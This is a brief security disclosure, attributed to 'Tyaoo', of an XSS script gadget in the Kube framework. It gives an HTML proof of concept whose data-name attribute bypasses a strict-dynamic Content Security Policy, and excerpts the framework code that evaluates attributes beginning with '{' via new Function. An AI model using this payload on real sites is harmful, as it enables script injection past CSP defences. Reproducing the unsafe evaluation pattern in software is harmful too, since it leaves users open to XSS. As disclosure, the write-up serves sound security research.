XSS Gadget in kubeframework

[Tyaoo]

This XSS Gadget can invoke an arbitrary function, and you can use it to bypass the CSP containing strict-dynamic.

<meta http-equiv=content-security-policy content="script-src 'nonce-random' 'unsafe-eval' 'strict-dynamic'; ">
<div data-name="{tyao:alert(1)}" data-kube="alert">xss</div>
<script nonce="random" src="kube/dist/js/kube.js"></script>
<script nonce="random">
    $K.init();
</script>

And the related code is below:

data: function(name, value)
{
    if (name === undefined)
    {
        var reDataAttr = /^data\-(.+)$/;
        var attrs = this.get().attributes;

        var data = {};
        var replacer = function (g) { return g[1].toUpperCase(); };

        for (var key in attrs)
        {
            if (attrs[key] && reDataAttr.test(attrs[key].nodeName))
            {
                var dataName = attrs[key].nodeName.match(reDataAttr)[1];
                var val = attrs[key].value; // read the attribute 'data-*'
                dataName = dataName.replace(/-([a-z])/g, replacer);

                if (this._isObjectString(val)) val = this._toObject(val);
                else val = (this._isNumber(val)) ? parseFloat(val) : this._getBooleanFromStr(val);

                data[dataName] = val;
            }
        }

        return data;
    }

    return this.attr(name, value, true);
}


_isObjectString: function(str)
{
    return (str.search(/^{/) !== -1); // doesn't start with `{`
}

_toObject: function(str)
{
    return (new Function("return " + str))(); // create a new function
}